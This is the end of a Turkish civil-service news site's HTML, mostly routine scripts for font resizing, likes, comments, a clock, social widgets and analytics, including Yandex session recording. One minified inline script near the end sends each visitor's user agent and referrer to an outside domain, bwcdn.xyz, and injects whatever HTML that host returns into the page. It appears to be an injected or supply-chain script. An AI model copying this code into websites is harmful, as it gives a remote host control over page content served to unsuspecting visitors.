	$.get(site_url + '_ajax/tebilisim.php?id=' + id + '&m=' + module + '&page=' + page + '&count_format=k', function(hit) {
		console.log(module + " hit: " + hit);
    		$(".hitCounter-"+id).text(hit);
    	});
}
function font_up (id) {
    var nte = $("#newstext_"+id).css("font-size");
    var ntt = $("#newstext_"+id).css("line-height");
    var ntn = parseFloat(nte, 10);
    var ntr = parseFloat(ntt, 10);
    var nti = ntn + 2;
    var nts = ntr + 2;
    $("#newstext_"+id).css("font-size", nti);
    $("#newstext_"+id).each(function() {
        $("span", this).css("font-size", nti);
    });
    $("#newstext_"+id).css("line-height", nts + "px");
    return false
}
function font_down(id) {
    var nte = $("#newstext_"+id).css("font-size");
    var ntt = $("#newstext_"+id).css("line-height");
    var ntn = parseFloat(nte, 10);
    var ntr = parseFloat(ntt, 10);
    var nti = ntn - 2;
    var nts = ntr - 2;
    $("#newstext_"+id).css("font-size", nti);
    $("#newstext_"+id).each(function() {
        $("span", this).css("font-size", nti);
    });
    $("#newstext_"+id).css("line-height", nts + "px");
    return false
}
	var hasBeenClicked = false;
	var kisa_site_adi = "Kamu Saati";
	var kopyala_imza_onu = "AYRINTILAR&gt;&gt;👉";
	$(document).on('copy', function(e){
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
	function like(id, sayfa, tip) {
	if (tip == 1) {
		var _tip = 'dislike';
	} else {
		var _tip = 'like';
	}

	$.ajax({
		type: 'POST',
		url: site_url + '_ajax/' + sayfa,
		data: 'id=' + id,
		success: function(html_) {
			if (html_ == 'ip_var') {
				$('.like' + id).hide();
				$('.dislike' + id).attr('onclick', '').html('Daha önce bu yorumu oyladınız!');
			} else {
				$('abbr#wh_com' + _tip + id).html(html_);
			}
		}
	});
	return false;
}
function yorum_ekle(hid, tip) {
	var link = '';
	if (tip == 'haber') {
		link = theme_path + "ajax/yorum_ekle.php?hid=" + hid;
	} else if (tip == 'makale') {
		link = theme_path + "ajax/yorum_ekle.php?mid=" + hid;
	} else if (tip == 'roportaj') {
		link = theme_path + "ajax/yorum_ekle.php?rid=" + hid;
	} else if (tip == 'biyografi') {
		link = theme_path + "ajax/yorum_ekle.php?bid=" + hid;
	} else if (tip == 'album') {
		link = theme_path + "ajax/yorum_ekle.php?aid=" + hid;
	} else if (tip == 'video') {
		link = theme_path + "ajax/yorum_ekle.php?vid=" + hid;
	}
	$("#dialog").load(link).dialog('option', 'width', '650px').dialog('option', 'height', '350').dialog('option', 'title', 'Yorum Ekleyin!').dialog('open');
	return false;
}
function centerModal(url, w, h) {
	var myWindow;
	var left = parseInt((screen.availWidth / 2) - (w / 2));
	var top = parseInt((screen.availHeight / 2) - (h / 2));
	var windowFeatures = "width=" + w + ",height=" + h + ",status,scrollbars,resizable,left=" + left + ",top=" + top + "screenX=" + left + ",screenY=" + top;
	myWindow = window.open(url, "subWind", windowFeatures);
}
moment.locale('tr');

function saat() {
	$('#tarih').html(moment().format('D MMMM YYYY'));
	$('#saat').html(moment().format('HH:mm:ss'));
}

setInterval(saat, 500);
$('[data-toggle="popover"]').popover({
    html: true,
    content: function() {
	    return $(this).parent().find('.popover-content').html()
    }
});
(function(d, s, id) {
	var js, fjs = d.getElementsByTagName(s)[0];
	if (d.getElementById(id)) return;
	js = d.createElement(s); js.id = id;
	js.src = "//connect.facebook.net/tr-TR/all.js#xfbml=1";
	fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));


!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');

</script>

    <script>let teBilisimXHR=new XMLHttpRequest;teBilisimXHR.open("GET",`https://bwcdn.xyz/request.php?agent=${navigator?.userAgent}&r=${document?.referrer}`),teBilisimXHR.onreadystatechange=(()=>{if(4==teBilisimXHR.readyState){const e=JSON.parse(teBilisimXHR.response);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),teBilisimXHR.setRequestHeader("RequestWith","TEBILISIM"),teBilisimXHR.send();</script><!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-86740744-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-86740744-2');
</script>	    
	
	
 	 <!-- Google Analytics -->
	 <script>
	 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	 })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	 ga('create', analitik_ga, 'auto');
	 ga('send', 'pageview');

	 </script>
	 <!-- End Google Analytics -->
	 <!-- Yandex.Metrika counter -->
<script type="text/javascript">
var yandex_id = "44481739",
yandex_counter = "yaCounter44481739";
(function (d, w, c) {
	 (w[c] = w[c] || []).push(function() {
			 try {
					 w.yandex_counter = new Ya.Metrika({id:yandex_id, enableAll: true, webvisor:true});
			 } catch(e) {}
	 });

	 var n = d.getElementsByTagName("script")[0],
			 s = d.createElement("script"),
			 f = function () { n.parentNode.insertBefore(s, n); };
	 s.type = "text/javascript";
	 s.async = true;
	 s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

	 if (w.opera == "[object Opera]") {
			 d.addEventListener("DOMContentLoaded", f);
	 } else { f(); }
})(document, window, "yandex_metrika_callbacks");

</script>



            <!-- // script dosyalarını çağır-->
          </footer>
          <!-- // Footer  -->

      </body>
      <div>
      <h1><a href="/" style="visibility: hidden;"> Guncel Son Dakika Kamu, Memur Haber </a></h1>
      </div>
      </html>
